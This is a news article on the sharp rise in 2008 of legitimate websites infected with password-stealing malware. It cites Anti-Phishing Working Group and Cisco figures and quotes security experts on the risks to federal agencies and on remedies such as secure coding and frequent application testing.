Number of infected Web sites sharply increases in 2008

The number of seemingly legitimate Web sites infected with malicious code that enables hackers to steal passwords to access computer networks is increasing, with one organization reporting an 827 percent jump in compromised sites in 2008.

The number of crimeware-infected URLs, which are Web sites containing malicious code designed to steal users' passwords by tracking their keystrokes, increased more than 163 percent in just one month, from 11,834 in November 2008 to 31,173 in December 2008, reported the Anti-Phishing Working Group, a coalition of industry and law enforcement agencies fighting identity theft from malware. In January 2008, just 3,363 sites were infected, according to the group.

"I think the numbers and information provided in the APWG report are pretty staggering," said Amit Yoran, chairman and chief executive officer of security software company NetWitness and former director of the Homeland Security Department's National Cybersecurity Division. "The federal agencies, like their counterparts in the private sector, are falling victim to these methods of exploitation. It is an ongoing and widespread problem that will continue to evolve and likely get significantly worse as criminal techniques evolve before they get any better."

The number of Web sites infected with malicious code is likely far more than reported by APWG, said Alan Paller, director of research at SANS Institute, a nonprofit group that researches cybersecurity. He estimated these sites are responsible for as much as 50 percent of "zombies," computers that have been compromised by a hacker.

The vulnerability, according to Paller, stems back to weak Web development. "People are told to visit only 'trusted Web sites,' but nearly all of the programmers who created those trusted sites made major errors that the bad guys figured out how to exploit," he said. "The solution is to ensure the programmers write secure code."

The same security threats originating from legitimate Web domains increased 90 percent in 2008, according to a report Cisco released. Typically, Web sites were infected with malicious code that redirected visitors to spoof sites that placed malware onto their computers. An estimated 20 percent of all legitimate sites have been infected by this type of attack, Cisco noted.

"Government agencies need to be concerned not only about inoculating their own agency Web sites from corruption, which in turn can infect visitors, but also protecting their networks from infected sites that their employees visit," said Gregory Garcia, who served as assistant secretary of cybersecurity and telecommunications at DHS during the Bush administration and now runs the information security consulting firm Garcia Strategies. "This threat is used by crime groups as well as nation states intent on espionage."

Federal agencies typically use antivirus software to block direct attacks against their networks, and employees are becoming more aware of phishing e-mail scams, which can download malicious software onto a computer by luring users to click on a link or attachment. The technique of infecting Web sites, however, is more difficult to detect, because the sites are often legitimate ones that agencies' firewalls rarely block. An increasing reliance on collaborative Web 2.0 technologies also makes federal agencies more vulnerable.

"[These] have become the attack vectors of choice for sophisticated hacker crews because they recognize that Web sites can serve as launch points by which to island hop into a government or commercial enterprise network," said Tom Kellermann, vice president of security awareness at Core Security Technologies and former senior data risk management specialist for the World Bank treasury security team.

Agencies should test sensitive Web applications frequently to determine how vulnerable they are, Kellermann said, and then develop aggressive remediation timelines for addressing identified vulnerabilities. They also should test the security of Web applications hosted by third party companies, which often can serve as conduits for hacker attacks.